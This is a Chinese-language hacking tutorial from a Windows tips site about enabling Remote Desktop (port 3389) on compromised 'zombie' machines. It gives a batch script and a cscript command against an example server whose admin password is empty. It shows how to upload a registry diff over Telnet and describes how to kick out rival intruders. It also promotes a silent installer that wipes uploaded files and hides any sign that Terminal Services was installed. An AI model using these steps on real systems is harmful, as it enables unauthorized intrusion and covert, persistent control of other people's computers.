不過如果手頭上沒有工具我們也可以進行手動的修改,首先我們需要自己生成一個注冊表升級升級文件。我們先將自己的作系統安裝為Windows 2000 Professional,使用注冊表照相機Regsnap這個工具對注冊表和整個系統生成報告,然後在找到Windows 2000 Server的安裝光盤,將Windows 2000 Professional作系統升級為Windows 2000 Server,在作系統升級完成後,再一次使用Regsnap對注冊表進行進行照像,然後在下載RegShot這個注冊表分析軟件將照的注冊表提取分析,輸出分析出的變化結果的差別文件,將差別文件保存為yu.reg。再一次用Telnet登陸溢出的目標計算機,然後上傳我們保存好的差別注冊表,在對方的作系統中輸入[regedit.exe /s yu.reg]這串命令,此時對方的計算機就升級為Windows 2000 Server了,而你也可以順利的開啟對方的3389服務了。

在成功的開啟了3389服務後,我們可以利用黑客營提供的3389連接工具對目標計算機進行遠程連接,不過此時你也許會感到不方便,因為3389的遠程管理不支持復制粘貼形式的文件傳輸,之能夠復制粘貼本機的一些字符。對付這個問題我們只需要在網上找一個小型的FTP開啟工具,將對方的FTP開啟就可以了。即便此時有人乘虛而入正搶你的“獵物”,你可以使用[logout]命令將對方踢下去,然後刪除掉對方溢出的帳號和口令,開啟之後在根據前面所說的修改端口,然後幫助“獵物”打好補丁,防止其它的入侵者破壞你的“獵物”。一套完美的3389控制就做好了。

怎麼樣開3389端口,這裡我把他們總結一下,很全面,希望對你有用:
1,打開記事本,編輯內容如下:
echo [Components] > c:\sql
echo TSEnable = on >> c:\sql
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
編輯好後存為BAT文件,上傳至肉雞,執行。這裡值得注意的是要確定winnt是否在c盤,如果在其他盤則需要改動。


2 (對xp\2000都有效) 腳本文件 本地開3389 工具:rots1.05
地址:www.netsill.com/rots.zip
使用方法:
在命令行方式下使用windows自帶的腳本宿主程序cscript.exe調用腳本,例如:

c:\>cscript ROTS.vbs <目標IP> <用戶名> <密碼> [服務端口] [自動重起選項]

服務端口: 設置終端服務的服務端口。默認是3389。
自動重起選項: 使用/r表示安裝完成後自動重起目標使設置生效。
使用/fr表示強制重起目標。(如果/r不行,可以試試這個)
使用此參數時,端口設置不能忽略。

比如掃描到了一個有NT弱口令的服務器,IP地址是222.222.222.222,管理員帳戶是administrator,密碼為空
運行CMD(2000下的DOS),我們給它開終端!
命令如下!
cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
上面的命令應該可以理解吧?cscript reg.vbe這是命令,後面的是IP,然後是管理員帳戶,接這是密碼,因為222.222.222.222 這台服務器的管理員密碼是空的,那就用雙引號表示為空,再後面是端口,你可以任意設置終端的端口,/fr是重啟命令(強制重啟,一般我都用這個,你也可以/r,這是普通重啟)

腳本會判斷目標系統類型,如果不是server及以上版本,就會提示你是否要取消。
因為pro版不能安裝終端服務。
如果你確信腳本判斷錯誤,就繼續安裝好了。

如果要對本地使用,IP地址為127.0.0.1或者一個點(用.表示),用戶名和密碼都為空(用""表示)。

腳本訪問的目標的135端口,如果目標135端口未開放,或者WMI服務關閉,那麼腳本就沒用了。


3,下載3389自動安裝程序-djshao正式版5.0
地址www.netsill.com/djshao.zip
說明:
解壓djshao5.0.zip,用你的隨便什麼方法把把解壓出來的djxyxs.exe上傳到肉雞的c:\winnt\temp下,然後進入c:\winnt\temp目錄執行djxyxs.exe解壓縮文件,然後再執行解壓縮出來的azzd.exe文件,等一會肉雞會自動重啟!重啟後會出現終端服務!

特點:1、不用修改注冊表的安裝路徑,注冊表會自動修改,安裝完後會自動恢復到原來的安裝路徑,2、在後台安靜模式運行,就算肉雞旁有人也沒有關系!3、在添加和刪除中看不出終端服務被安裝的痕跡,也就是啟動終端前不會打鉤,4、不會在肉雞上留下你的上傳文件,在安裝完終端服務後會會自動刪除你上傳到c:\winnt\temp下的任何文件!5、不管肉雞的winnt裝在什麼盤上都無所謂!6、安裝完終端後會刪除在管理工具中的終端快捷圖標!7、在沒有安裝終端前,終端服務是被禁止的!安裝終端後,終端服務被改為自動!但是如果在安裝前終端服務是手動!安裝後就可能還是手動!等重啟後就不會打開服務!所以在軟件中加了sc指令,等安裝完後,不管終端服務是禁止還是手動還是自動,全部改為自動。8、自動檢測肉雞是不是服務器版,如果不是刪除原文件,不執行安裝,如果是服務器版就執行安裝!9、支持中日韓繁四個版本的win2000服務器版!

5,下載DameWare NT Utilities 3.66.0.0 注冊版
地址www.netsill.com/dwmrcw36600.zip
安裝注冊完畢後輸入對方IP用戶名密碼,等待出現是否安裝的對話框點是。
復制啟動後出現對方桌面。
在對方桌面進入控制面版,點添加或刪除程序。進入後點添加/刪除windows組件,找到終端服務,點際進入後在啟動終端服務上打上勾。確定自動提示重起,重起後OK。
 
 

Copyright © Windows教程網 All Rights Reserved